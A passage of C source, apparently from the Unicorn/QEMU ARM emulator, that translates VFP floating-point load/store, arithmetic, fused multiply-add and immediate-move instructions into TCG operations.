tcg_temp_free_i32(tcg_ctx, tmp); } return true; } static bool trans_VLDR_VSTR_sp(DisasContext *s, arg_VLDR_VSTR_sp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t offset; TCGv_i32 addr, tmp; if (!dc_isar_feature(aa32_fpsp_v2, s)) { return false; } if (!vfp_access_check(s)) { return true; } offset = a->imm << 2; if (!a->u) { #ifdef _MSC_VER offset = 0 - offset; #else offset = -offset; #endif } /* For thumb, use of PC is UNPREDICTABLE. */ addr = add_reg_for_lit(s, a->rn, offset); tmp = tcg_temp_new_i32(tcg_ctx); if (a->l) { gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); neon_store_reg32(tcg_ctx, tmp, a->vd); } else { neon_load_reg32(tcg_ctx, tmp, a->vd); gen_aa32_st32(s, tmp, addr, get_mem_index(s)); } tcg_temp_free_i32(tcg_ctx, tmp); tcg_temp_free_i32(tcg_ctx, addr); return true; } static bool trans_VLDR_VSTR_dp(DisasContext *s, arg_VLDR_VSTR_dp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t offset; TCGv_i32 addr; TCGv_i64 tmp; /* Note that this does not require support for double arithmetic. */ if (!dc_isar_feature(aa32_fpsp_v2, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist */ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vd & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } offset = a->imm << 2; if (!a->u) { #ifdef _MSC_VER offset = 0 - offset; #else offset = -offset; #endif } /* For thumb, use of PC is UNPREDICTABLE. */ addr = add_reg_for_lit(s, a->rn, offset); tmp = tcg_temp_new_i64(tcg_ctx); if (a->l) { gen_aa32_ld64(s, tmp, addr, get_mem_index(s)); neon_store_reg64(tcg_ctx, tmp, a->vd); } else { neon_load_reg64(tcg_ctx, tmp, a->vd); gen_aa32_st64(s, tmp, addr, get_mem_index(s)); } tcg_temp_free_i64(tcg_ctx, tmp); tcg_temp_free_i32(tcg_ctx, addr); return true; } static bool trans_VLDM_VSTM_sp(DisasContext *s, arg_VLDM_VSTM_sp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t offset; TCGv_i32 addr, tmp; int i, n; if (!dc_isar_feature(aa32_fpsp_v2, s)) { return false; } n = a->imm; if (n == 0 || (a->vd + n) > 32) { /* * UNPREDICTABLE cases for bad immediates: we choose to * UNDEF to avoid generating huge numbers of TCG ops */ return false; } if (a->rn == 15 && a->w) { /* writeback to PC is UNPREDICTABLE, we choose to UNDEF */ return false; } if (!vfp_access_check(s)) { return true; } /* For thumb, use of PC is UNPREDICTABLE. */ addr = add_reg_for_lit(s, a->rn, 0); if (a->p) { /* pre-decrement */ tcg_gen_addi_i32(tcg_ctx, addr, addr, -(a->imm << 2)); } if (s->v8m_stackcheck && a->rn == 13 && a->w) { /* * Here 'addr' is the lowest address we will store to, * and is either the old SP (if post-increment) or * the new SP (if pre-decrement). For post-increment * where the old value is below the limit and the new * value is above, it is UNKNOWN whether the limit check * triggers; we choose to trigger. */ gen_helper_v8m_stackcheck(tcg_ctx, tcg_ctx->cpu_env, addr); } offset = 4; tmp = tcg_temp_new_i32(tcg_ctx); for (i = 0; i < n; i++) { if (a->l) { /* load */ gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); neon_store_reg32(tcg_ctx, tmp, a->vd + i); } else { /* store */ neon_load_reg32(tcg_ctx, tmp, a->vd + i); gen_aa32_st32(s, tmp, addr, get_mem_index(s)); } tcg_gen_addi_i32(tcg_ctx, addr, addr, offset); } tcg_temp_free_i32(tcg_ctx, tmp); if (a->w) { /* writeback */ if (a->p) { #ifdef _MSC_VER offset = (0 - offset) * n; #else offset = -offset * n; #endif tcg_gen_addi_i32(tcg_ctx, addr, addr, offset); } store_reg(s, a->rn, addr); } else { tcg_temp_free_i32(tcg_ctx, addr); } return true; } static bool trans_VLDM_VSTM_dp(DisasContext *s, arg_VLDM_VSTM_dp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t offset; TCGv_i32 addr; TCGv_i64 tmp; int i, n; /* Note that this does not require support for double arithmetic. */ if (!dc_isar_feature(aa32_fpsp_v2, s)) { return false; } n = a->imm >> 1; if (n == 0 || (a->vd + n) > 32 || n > 16) { /* * UNPREDICTABLE cases for bad immediates: we choose to * UNDEF to avoid generating huge numbers of TCG ops */ return false; } if (a->rn == 15 && a->w) { /* writeback to PC is UNPREDICTABLE, we choose to UNDEF */ return false; } /* UNDEF accesses to D16-D31 if they don't exist */ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vd + n) > 16) { return false; } if (!vfp_access_check(s)) { return true; } /* For thumb, use of PC is UNPREDICTABLE. */ addr = add_reg_for_lit(s, a->rn, 0); if (a->p) { /* pre-decrement */ tcg_gen_addi_i32(tcg_ctx, addr, addr, -(a->imm << 2)); } if (s->v8m_stackcheck && a->rn == 13 && a->w) { /* * Here 'addr' is the lowest address we will store to, * and is either the old SP (if post-increment) or * the new SP (if pre-decrement). For post-increment * where the old value is below the limit and the new * value is above, it is UNKNOWN whether the limit check * triggers; we choose to trigger. */ gen_helper_v8m_stackcheck(tcg_ctx, tcg_ctx->cpu_env, addr); } offset = 8; tmp = tcg_temp_new_i64(tcg_ctx); for (i = 0; i < n; i++) { if (a->l) { /* load */ gen_aa32_ld64(s, tmp, addr, get_mem_index(s)); neon_store_reg64(tcg_ctx, tmp, a->vd + i); } else { /* store */ neon_load_reg64(tcg_ctx, tmp, a->vd + i); gen_aa32_st64(s, tmp, addr, get_mem_index(s)); } tcg_gen_addi_i32(tcg_ctx, addr, addr, offset); } tcg_temp_free_i64(tcg_ctx, tmp); if (a->w) { /* writeback */ if (a->p) { #ifdef _MSC_VER offset = (0 - offset) * n; #else offset = -offset * n; #endif } else if (a->imm & 1) { offset = 4; } else { offset = 0; } if (offset != 0) { tcg_gen_addi_i32(tcg_ctx, addr, addr, offset); } store_reg(s, a->rn, addr); } else { tcg_temp_free_i32(tcg_ctx, addr); } return true; } /* * Types for callbacks for do_vfp_3op_sp() and do_vfp_3op_dp(). * The callback should emit code to write a value to vd. If * do_vfp_3op_{sp,dp}() was passed reads_vd then the TCGv vd * will contain the old value of the relevant VFP register; * otherwise it must be written to only. */ typedef void VFPGen3OpSPFn(TCGContext *, TCGv_i32 vd, TCGv_i32 vn, TCGv_i32 vm, TCGv_ptr fpst); typedef void VFPGen3OpDPFn(TCGContext *, TCGv_i64 vd, TCGv_i64 vn, TCGv_i64 vm, TCGv_ptr fpst); /* * Types for callbacks for do_vfp_2op_sp() and do_vfp_2op_dp(). * The callback should emit code to write a value to vd (which * should be written to only). */ typedef void VFPGen2OpSPFn(TCGContext *, TCGv_i32 vd, TCGv_i32 vm); typedef void VFPGen2OpDPFn(TCGContext *, TCGv_i64 vd, TCGv_i64 vm); /* * Return true if the specified S reg is in a scalar bank * (ie if it is s0..s7) */ static inline bool vfp_sreg_is_scalar(int reg) { return (reg & 0x18) == 0; } /* * Return true if the specified D reg is in a scalar bank * (ie if it is d0..d3 or d16..d19) */ static inline bool vfp_dreg_is_scalar(int reg) { return (reg & 0xc) == 0; } /* * Advance the S reg number forwards by delta within its bank * (ie increment the low 3 bits but leave the rest the same) */ static inline int vfp_advance_sreg(int reg, int delta) { return ((reg + delta) & 0x7) | (reg & ~0x7); } /* * Advance the D reg number forwards by delta within its bank * (ie increment the low 2 bits but leave the rest the same) */ static inline int vfp_advance_dreg(int reg, int delta) { return ((reg + delta) & 0x3) | (reg & ~0x3); } /* * Perform a 3-operand VFP data processing instruction. fn is the * callback to do the actual operation; this function deals with the * code to handle looping around for VFP vector processing. */ static bool do_vfp_3op_sp(DisasContext *s, VFPGen3OpSPFn *fn, int vd, int vn, int vm, bool reads_vd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t delta_m = 0; uint32_t delta_d = 0; int veclen = s->vec_len; TCGv_i32 f0, f1, fd; TCGv_ptr fpst; if (!dc_isar_feature(aa32_fpsp_v2, s)) { return false; } if (!dc_isar_feature(aa32_fpshvec, s) && (veclen != 0 || s->vec_stride != 0)) { return false; } if (!vfp_access_check(s)) { return true; } if (veclen > 0) { /* Figure out what type of vector operation this is. */ if (vfp_sreg_is_scalar(vd)) { /* scalar */ veclen = 0; } else { delta_d = s->vec_stride + 1; if (vfp_sreg_is_scalar(vm)) { /* mixed scalar/vector */ delta_m = 0; } else { /* vector */ delta_m = delta_d; } } } f0 = tcg_temp_new_i32(tcg_ctx); f1 = tcg_temp_new_i32(tcg_ctx); fd = tcg_temp_new_i32(tcg_ctx); fpst = get_fpstatus_ptr(tcg_ctx, 0); neon_load_reg32(tcg_ctx, f0, vn); neon_load_reg32(tcg_ctx, f1, vm); for (;;) { if (reads_vd) { neon_load_reg32(tcg_ctx, fd, vd); } fn(tcg_ctx, fd, f0, f1, fpst); neon_store_reg32(tcg_ctx, fd, vd); if (veclen == 0) { break; } /* Set up the operands for the next iteration */ veclen--; vd = vfp_advance_sreg(vd, delta_d); vn = vfp_advance_sreg(vn, delta_d); neon_load_reg32(tcg_ctx, f0, vn); if (delta_m) { vm = vfp_advance_sreg(vm, delta_m); neon_load_reg32(tcg_ctx, f1, vm); } } tcg_temp_free_i32(tcg_ctx, f0); tcg_temp_free_i32(tcg_ctx, f1); tcg_temp_free_i32(tcg_ctx, fd); tcg_temp_free_ptr(tcg_ctx, fpst); return true; } static bool do_vfp_3op_dp(DisasContext *s, VFPGen3OpDPFn *fn, int vd, int vn, int vm, bool reads_vd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t delta_m = 0; uint32_t delta_d = 0; int veclen = s->vec_len; TCGv_i64 f0, f1, fd; TCGv_ptr fpst; if (!dc_isar_feature(aa32_fpdp_v2, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist */ if (!dc_isar_feature(aa32_simd_r32, s) && ((vd | vn | vm) & 0x10)) { return false; } if (!dc_isar_feature(aa32_fpshvec, s) && (veclen != 0 || s->vec_stride != 0)) { return false; } if (!vfp_access_check(s)) { return true; } if (veclen > 0) { /* Figure out what type of vector operation this is. */ if (vfp_dreg_is_scalar(vd)) { /* scalar */ veclen = 0; } else { delta_d = (s->vec_stride >> 1) + 1; if (vfp_dreg_is_scalar(vm)) { /* mixed scalar/vector */ delta_m = 0; } else { /* vector */ delta_m = delta_d; } } } f0 = tcg_temp_new_i64(tcg_ctx); f1 = tcg_temp_new_i64(tcg_ctx); fd = tcg_temp_new_i64(tcg_ctx); fpst = get_fpstatus_ptr(tcg_ctx, 0); neon_load_reg64(tcg_ctx, f0, vn); neon_load_reg64(tcg_ctx, f1, vm); for (;;) { if (reads_vd) { neon_load_reg64(tcg_ctx, fd, vd); } fn(tcg_ctx, fd, f0, f1, fpst); neon_store_reg64(tcg_ctx, fd, vd); if (veclen == 0) { break; } /* Set up the operands for the next iteration */ veclen--; vd = vfp_advance_dreg(vd, delta_d); vn = vfp_advance_dreg(vn, delta_d); neon_load_reg64(tcg_ctx, f0, vn); if (delta_m) { vm = vfp_advance_dreg(vm, delta_m); neon_load_reg64(tcg_ctx, f1, vm); } } tcg_temp_free_i64(tcg_ctx, f0); tcg_temp_free_i64(tcg_ctx, f1); tcg_temp_free_i64(tcg_ctx, fd); tcg_temp_free_ptr(tcg_ctx, fpst); return true; } static bool do_vfp_2op_sp(DisasContext *s, VFPGen2OpSPFn *fn, int vd, int vm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t delta_m = 0; uint32_t delta_d = 0; int veclen = s->vec_len; TCGv_i32 f0, fd; if (!dc_isar_feature(aa32_fpsp_v2, s)) { return false; } if (!dc_isar_feature(aa32_fpshvec, s) && (veclen != 0 || s->vec_stride != 0)) { return false; } if (!vfp_access_check(s)) { return true; } if (veclen > 0) { /* Figure out what type of vector operation this is. */ if (vfp_sreg_is_scalar(vd)) { /* scalar */ veclen = 0; } else { delta_d = s->vec_stride + 1; if (vfp_sreg_is_scalar(vm)) { /* mixed scalar/vector */ delta_m = 0; } else { /* vector */ delta_m = delta_d; } } } f0 = tcg_temp_new_i32(tcg_ctx); fd = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, f0, vm); for (;;) { fn(tcg_ctx, fd, f0); neon_store_reg32(tcg_ctx, fd, vd); if (veclen == 0) { break; } if (delta_m == 0) { /* single source one-many */ while (veclen--) { vd = vfp_advance_sreg(vd, delta_d); neon_store_reg32(tcg_ctx, fd, vd); } break; } /* Set up the operands for the next iteration */ veclen--; vd = vfp_advance_sreg(vd, delta_d); vm = vfp_advance_sreg(vm, delta_m); neon_load_reg32(tcg_ctx, f0, vm); } tcg_temp_free_i32(tcg_ctx, f0); tcg_temp_free_i32(tcg_ctx, fd); return true; } static bool do_vfp_2op_dp(DisasContext *s, VFPGen2OpDPFn *fn, int vd, int vm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t delta_m = 0; uint32_t delta_d = 0; int veclen = s->vec_len; TCGv_i64 f0, fd; if (!dc_isar_feature(aa32_fpdp_v2, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist */ if (!dc_isar_feature(aa32_simd_r32, s) && ((vd | vm) & 0x10)) { return false; } if (!dc_isar_feature(aa32_fpshvec, s) && (veclen != 0 || s->vec_stride != 0)) { return false; } if (!vfp_access_check(s)) { return true; } if (veclen > 0) { /* Figure out what type of vector operation this is. */ if (vfp_dreg_is_scalar(vd)) { /* scalar */ veclen = 0; } else { delta_d = (s->vec_stride >> 1) + 1; if (vfp_dreg_is_scalar(vm)) { /* mixed scalar/vector */ delta_m = 0; } else { /* vector */ delta_m = delta_d; } } } f0 = tcg_temp_new_i64(tcg_ctx); fd = tcg_temp_new_i64(tcg_ctx); neon_load_reg64(tcg_ctx, f0, vm); for (;;) { fn(tcg_ctx, fd, f0); neon_store_reg64(tcg_ctx, fd, vd); if (veclen == 0) { break; } if (delta_m == 0) { /* single source one-many */ while (veclen--) { vd = vfp_advance_dreg(vd, delta_d); neon_store_reg64(tcg_ctx, fd, vd); } break; } /* Set up the operands for the next iteration */ veclen--; vd = vfp_advance_dreg(vd, delta_d); vd = vfp_advance_dreg(vm, delta_m); neon_load_reg64(tcg_ctx, f0, vm); } tcg_temp_free_i64(tcg_ctx, f0); tcg_temp_free_i64(tcg_ctx, fd); return true; } static void gen_VMLA_sp(TCGContext *tcg_ctx, TCGv_i32 vd, TCGv_i32 vn, TCGv_i32 vm, TCGv_ptr fpst) { /* Note that order of inputs to the add matters for NaNs */ TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); gen_helper_vfp_muls(tcg_ctx, tmp, vn, vm, fpst); gen_helper_vfp_adds(tcg_ctx, vd, vd, tmp, fpst); tcg_temp_free_i32(tcg_ctx, tmp); } static bool trans_VMLA_sp(DisasContext *s, arg_VMLA_sp *a) { return do_vfp_3op_sp(s, gen_VMLA_sp, a->vd, a->vn, a->vm, true); } static void gen_VMLA_dp(TCGContext *tcg_ctx, TCGv_i64 vd, TCGv_i64 vn, TCGv_i64 vm, TCGv_ptr fpst) { /* Note that order of inputs to the add matters for NaNs */ TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); gen_helper_vfp_muld(tcg_ctx, tmp, vn, vm, fpst); gen_helper_vfp_addd(tcg_ctx, vd, vd, tmp, fpst); tcg_temp_free_i64(tcg_ctx, tmp); } static bool trans_VMLA_dp(DisasContext *s, arg_VMLA_dp *a) { return do_vfp_3op_dp(s, gen_VMLA_dp, a->vd, a->vn, a->vm, true); } static void gen_VMLS_sp(TCGContext *tcg_ctx, TCGv_i32 vd, TCGv_i32 vn, TCGv_i32 vm, TCGv_ptr fpst) { /* * VMLS: vd = vd + -(vn * vm) * Note that order of inputs to the add matters for NaNs. */ TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); gen_helper_vfp_muls(tcg_ctx, tmp, vn, vm, fpst); gen_helper_vfp_negs(tcg_ctx, tmp, tmp); gen_helper_vfp_adds(tcg_ctx, vd, vd, tmp, fpst); tcg_temp_free_i32(tcg_ctx, tmp); } static bool trans_VMLS_sp(DisasContext *s, arg_VMLS_sp *a) { return do_vfp_3op_sp(s, gen_VMLS_sp, a->vd, a->vn, a->vm, true); } static void gen_VMLS_dp(TCGContext *tcg_ctx, TCGv_i64 vd, TCGv_i64 vn, TCGv_i64 vm, TCGv_ptr fpst) { /* * VMLS: vd = vd + -(vn * vm) * Note that order of inputs to the add matters for NaNs. */ TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); gen_helper_vfp_muld(tcg_ctx, tmp, vn, vm, fpst); gen_helper_vfp_negd(tcg_ctx, tmp, tmp); gen_helper_vfp_addd(tcg_ctx, vd, vd, tmp, fpst); tcg_temp_free_i64(tcg_ctx, tmp); } static bool trans_VMLS_dp(DisasContext *s, arg_VMLS_dp *a) { return do_vfp_3op_dp(s, gen_VMLS_dp, a->vd, a->vn, a->vm, true); } static void gen_VNMLS_sp(TCGContext *tcg_ctx, TCGv_i32 vd, TCGv_i32 vn, TCGv_i32 vm, TCGv_ptr fpst) { /* * VNMLS: -fd + (fn * fm) * Note that it isn't valid to replace (-A + B) with (B - A) or similar * plausible looking simplifications because this will give wrong results * for NaNs. */ TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); gen_helper_vfp_muls(tcg_ctx, tmp, vn, vm, fpst); gen_helper_vfp_negs(tcg_ctx, vd, vd); gen_helper_vfp_adds(tcg_ctx, vd, vd, tmp, fpst); tcg_temp_free_i32(tcg_ctx, tmp); } static bool trans_VNMLS_sp(DisasContext *s, arg_VNMLS_sp *a) { return do_vfp_3op_sp(s, gen_VNMLS_sp, a->vd, a->vn, a->vm, true); } static void gen_VNMLS_dp(TCGContext *tcg_ctx, TCGv_i64 vd, TCGv_i64 vn, TCGv_i64 vm, TCGv_ptr fpst) { /* * VNMLS: -fd + (fn * fm) * Note that it isn't valid to replace (-A + B) with (B - A) or similar * plausible looking simplifications because this will give wrong results * for NaNs. */ TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); gen_helper_vfp_muld(tcg_ctx, tmp, vn, vm, fpst); gen_helper_vfp_negd(tcg_ctx, vd, vd); gen_helper_vfp_addd(tcg_ctx, vd, vd, tmp, fpst); tcg_temp_free_i64(tcg_ctx, tmp); } static bool trans_VNMLS_dp(DisasContext *s, arg_VNMLS_dp *a) { return do_vfp_3op_dp(s, gen_VNMLS_dp, a->vd, a->vn, a->vm, true); } static void gen_VNMLA_sp(TCGContext *tcg_ctx, TCGv_i32 vd, TCGv_i32 vn, TCGv_i32 vm, TCGv_ptr fpst) { /* VNMLA: -fd + -(fn * fm) */ TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); gen_helper_vfp_muls(tcg_ctx, tmp, vn, vm, fpst); gen_helper_vfp_negs(tcg_ctx, tmp, tmp); gen_helper_vfp_negs(tcg_ctx, vd, vd); gen_helper_vfp_adds(tcg_ctx, vd, vd, tmp, fpst); tcg_temp_free_i32(tcg_ctx, tmp); } static bool trans_VNMLA_sp(DisasContext *s, arg_VNMLA_sp *a) { return do_vfp_3op_sp(s, gen_VNMLA_sp, a->vd, a->vn, a->vm, true); } static void gen_VNMLA_dp(TCGContext *tcg_ctx, TCGv_i64 vd, TCGv_i64 vn, TCGv_i64 vm, TCGv_ptr fpst) { /* VNMLA: -fd + (fn * fm) */ TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); gen_helper_vfp_muld(tcg_ctx, tmp, vn, vm, fpst); gen_helper_vfp_negd(tcg_ctx, tmp, tmp); gen_helper_vfp_negd(tcg_ctx, vd, vd); gen_helper_vfp_addd(tcg_ctx, vd, vd, tmp, fpst); tcg_temp_free_i64(tcg_ctx, tmp); } static bool trans_VNMLA_dp(DisasContext *s, arg_VNMLA_dp *a) { return do_vfp_3op_dp(s, gen_VNMLA_dp, a->vd, a->vn, a->vm, true); } static bool trans_VMUL_sp(DisasContext *s, arg_VMUL_sp *a) { return do_vfp_3op_sp(s, gen_helper_vfp_muls, a->vd, a->vn, a->vm, false); } static bool trans_VMUL_dp(DisasContext *s, arg_VMUL_dp *a) { return do_vfp_3op_dp(s, gen_helper_vfp_muld, a->vd, a->vn, a->vm, false); } static void gen_VNMUL_sp(TCGContext *tcg_ctx, TCGv_i32 vd, TCGv_i32 vn, TCGv_i32 vm, TCGv_ptr fpst) { /* VNMUL: -(fn * fm) */ gen_helper_vfp_muls(tcg_ctx, vd, vn, vm, fpst); gen_helper_vfp_negs(tcg_ctx, vd, vd); } static bool trans_VNMUL_sp(DisasContext *s, arg_VNMUL_sp *a) { return do_vfp_3op_sp(s, gen_VNMUL_sp, a->vd, a->vn, a->vm, false); } static void gen_VNMUL_dp(TCGContext *tcg_ctx, TCGv_i64 vd, TCGv_i64 vn, TCGv_i64 vm, TCGv_ptr fpst) { /* VNMUL: -(fn * fm) */ gen_helper_vfp_muld(tcg_ctx, vd, vn, vm, fpst); gen_helper_vfp_negd(tcg_ctx, vd, vd); } static bool trans_VNMUL_dp(DisasContext *s, arg_VNMUL_dp *a) { return do_vfp_3op_dp(s, gen_VNMUL_dp, a->vd, a->vn, a->vm, false); } static bool trans_VADD_sp(DisasContext *s, arg_VADD_sp *a) { return do_vfp_3op_sp(s, gen_helper_vfp_adds, a->vd, a->vn, a->vm, false); } static bool trans_VADD_dp(DisasContext *s, arg_VADD_dp *a) { return do_vfp_3op_dp(s, gen_helper_vfp_addd, a->vd, a->vn, a->vm, false); } static bool trans_VSUB_sp(DisasContext *s, arg_VSUB_sp *a) { return do_vfp_3op_sp(s, gen_helper_vfp_subs, a->vd, a->vn, a->vm, false); } static bool trans_VSUB_dp(DisasContext *s, arg_VSUB_dp *a) { return do_vfp_3op_dp(s, gen_helper_vfp_subd, a->vd, a->vn, a->vm, false); } static bool trans_VDIV_sp(DisasContext *s, arg_VDIV_sp *a) { return do_vfp_3op_sp(s, gen_helper_vfp_divs, a->vd, a->vn, a->vm, false); } static bool trans_VDIV_dp(DisasContext *s, arg_VDIV_dp *a) { return do_vfp_3op_dp(s, gen_helper_vfp_divd, a->vd, a->vn, a->vm, false); } static bool trans_VMINNM_sp(DisasContext *s, arg_VMINNM_sp *a) { if (!dc_isar_feature(aa32_vminmaxnm, s)) { return false; } return do_vfp_3op_sp(s, gen_helper_vfp_minnums, a->vd, a->vn, a->vm, false); } static bool trans_VMAXNM_sp(DisasContext *s, arg_VMAXNM_sp *a) { if (!dc_isar_feature(aa32_vminmaxnm, s)) { return false; } return do_vfp_3op_sp(s, gen_helper_vfp_maxnums, a->vd, a->vn, a->vm, false); } static bool trans_VMINNM_dp(DisasContext *s, arg_VMINNM_dp *a) { if (!dc_isar_feature(aa32_vminmaxnm, s)) { return false; } return do_vfp_3op_dp(s, gen_helper_vfp_minnumd, a->vd, a->vn, a->vm, false); } static bool trans_VMAXNM_dp(DisasContext *s, arg_VMAXNM_dp *a) { if (!dc_isar_feature(aa32_vminmaxnm, s)) { return false; } return do_vfp_3op_dp(s, gen_helper_vfp_maxnumd, a->vd, a->vn, a->vm, false); } static bool do_vfm_sp(DisasContext *s, arg_VFMA_sp *a, bool neg_n, bool neg_d) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* * VFNMA : fd = muladd(-fd, fn, fm) * VFNMS : fd = muladd(-fd, -fn, fm) * VFMA : fd = muladd( fd, fn, fm) * VFMS : fd = muladd( fd, -fn, fm) * * These are fused multiply-add, and must be done as one floating * point operation with no rounding between the multiplication and * addition steps. NB that doing the negations here as separate * steps is correct : an input NaN should come out with its sign * bit flipped if it is a negated-input. */ TCGv_ptr fpst; TCGv_i32 vn, vm, vd; /* * Present in VFPv4 only. * Note that we can't rely on the SIMDFMAC check alone, because * in a Neon-no-VFP core that ID register field will be non-zero. */ if (!dc_isar_feature(aa32_simdfmac, s) || !dc_isar_feature(aa32_fpsp_v2, s)) { return false; } /* * In v7A, UNPREDICTABLE with non-zero vector length/stride; from * v8A, must UNDEF. We choose to UNDEF for both v7A and v8A. */ if (s->vec_len != 0 || s->vec_stride != 0) { return false; } if (!vfp_access_check(s)) { return true; } vn = tcg_temp_new_i32(tcg_ctx); vm = tcg_temp_new_i32(tcg_ctx); vd = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, vn, a->vn); neon_load_reg32(tcg_ctx, vm, a->vm); if (neg_n) { /* VFNMS, VFMS */ gen_helper_vfp_negs(tcg_ctx, vn, vn); } neon_load_reg32(tcg_ctx, vd, a->vd); if (neg_d) { /* VFNMA, VFNMS */ gen_helper_vfp_negs(tcg_ctx, vd, vd); } fpst = get_fpstatus_ptr(tcg_ctx, 0); gen_helper_vfp_muladds(tcg_ctx, vd, vn, vm, vd, fpst); neon_store_reg32(tcg_ctx, vd, a->vd); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, vn); tcg_temp_free_i32(tcg_ctx, vm); tcg_temp_free_i32(tcg_ctx, vd); return true; } static bool trans_VFMA_sp(DisasContext *s, arg_VFMA_sp *a) { return do_vfm_sp(s, a, false, false); } static bool trans_VFMS_sp(DisasContext *s, arg_VFMS_sp *a) { return do_vfm_sp(s, a, true, false); } static bool trans_VFNMA_sp(DisasContext *s, arg_VFNMA_sp *a) { return do_vfm_sp(s, a, false, true); } static bool trans_VFNMS_sp(DisasContext *s, arg_VFNMS_sp *a) { return do_vfm_sp(s, a, true, true); } static bool do_vfm_dp(DisasContext *s, arg_VFMA_dp *a, bool neg_n, bool neg_d) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* * VFNMA : fd = muladd(-fd, fn, fm) * VFNMS : fd = muladd(-fd, -fn, fm) * VFMA : fd = muladd( fd, fn, fm) * VFMS : fd = muladd( fd, -fn, fm) * * These are fused multiply-add, and must be done as one floating * point operation with no rounding between the multiplication and * addition steps. NB that doing the negations here as separate * steps is correct : an input NaN should come out with its sign * bit flipped if it is a negated-input. */ TCGv_ptr fpst; TCGv_i64 vn, vm, vd; /* * Present in VFPv4 only. * Note that we can't rely on the SIMDFMAC check alone, because * in a Neon-no-VFP core that ID register field will be non-zero. */ if (!dc_isar_feature(aa32_simdfmac, s) || !dc_isar_feature(aa32_fpdp_v2, s)) { return false; } /* * In v7A, UNPREDICTABLE with non-zero vector length/stride; from * v8A, must UNDEF. We choose to UNDEF for both v7A and v8A. */ if (s->vec_len != 0 || s->vec_stride != 0) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. */ if (!dc_isar_feature(aa32_simd_r32, s) && ((a->vd | a->vn | a->vm) & 0x10)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. */ if (!dc_isar_feature(aa32_simd_r32, s) && ((a->vd | a->vn | a->vm) & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } vn = tcg_temp_new_i64(tcg_ctx); vm = tcg_temp_new_i64(tcg_ctx); vd = tcg_temp_new_i64(tcg_ctx); neon_load_reg64(tcg_ctx, vn, a->vn); neon_load_reg64(tcg_ctx, vm, a->vm); if (neg_n) { /* VFNMS, VFMS */ gen_helper_vfp_negd(tcg_ctx, vn, vn); } neon_load_reg64(tcg_ctx, vd, a->vd); if (neg_d) { /* VFNMA, VFNMS */ gen_helper_vfp_negd(tcg_ctx, vd, vd); } fpst = get_fpstatus_ptr(tcg_ctx, 0); gen_helper_vfp_muladdd(tcg_ctx, vd, vn, vm, vd, fpst); neon_store_reg64(tcg_ctx, vd, a->vd); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i64(tcg_ctx, vn); tcg_temp_free_i64(tcg_ctx, vm); tcg_temp_free_i64(tcg_ctx, vd); return true; } static bool trans_VFMA_dp(DisasContext *s, arg_VFMA_dp *a) { return do_vfm_dp(s, a, false, false); } static bool trans_VFMS_dp(DisasContext *s, arg_VFMS_dp *a) { return do_vfm_dp(s, a, true, false); } static bool trans_VFNMA_dp(DisasContext *s, arg_VFNMA_dp *a) { return do_vfm_dp(s, a, false, true); } static bool trans_VFNMS_dp(DisasContext *s, arg_VFNMS_dp *a) { return do_vfm_dp(s, a, true, true); } static bool trans_VMOV_imm_sp(DisasContext *s, arg_VMOV_imm_sp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t delta_d = 0; int veclen = s->vec_len; TCGv_i32 fd; uint32_t vd; vd = a->vd; if (!dc_isar_feature(aa32_fpsp_v3, s)) { return false; } if (!dc_isar_feature(aa32_fpshvec, s) && (veclen != 0 || s->vec_stride != 0)) { return false; } if (!vfp_access_check(s)) { return true; } if (veclen > 0) { /* Figure out what type of vector operation this is. */ if (vfp_sreg_is_scalar(vd)) { /* scalar */ veclen = 0; } else { delta_d = s->vec_stride + 1; } } fd = tcg_const_i32(tcg_ctx, vfp_expand_imm(MO_32, a->imm)); for (;;) { neon_store_reg32(tcg_ctx, fd, vd); if (veclen == 0) { break; } /* Set up the operands for the next iteration */ veclen--; vd = vfp_advance_sreg(vd, delta_d); } tcg_temp_free_i32(tcg_ctx, fd); return true; } static bool trans_VMOV_imm_dp(DisasContext *s, arg_VMOV_imm_dp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t delta_d = 0; int veclen = s->vec_len; TCGv_i64 fd; uint32_t vd; vd = a->vd; if (!dc_isar_feature(aa32_fpdp_v3, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. */ if (!dc_isar_feature(aa32_simd_r32, s) && (vd & 0x10)) { return false; } if (!dc_isar_feature(aa32_fpshvec, s) && (veclen != 0 || s->vec_stride != 0)) { return false; } if (!vfp_access_check(s)) { return true; } if (veclen > 0) { /* Figure out what type of vector operation this is. */ if (vfp_dreg_is_scalar(vd)) { /* scalar */ veclen = 0; } else { delta_d = (s->vec_stride >> 1) + 1; } } fd = 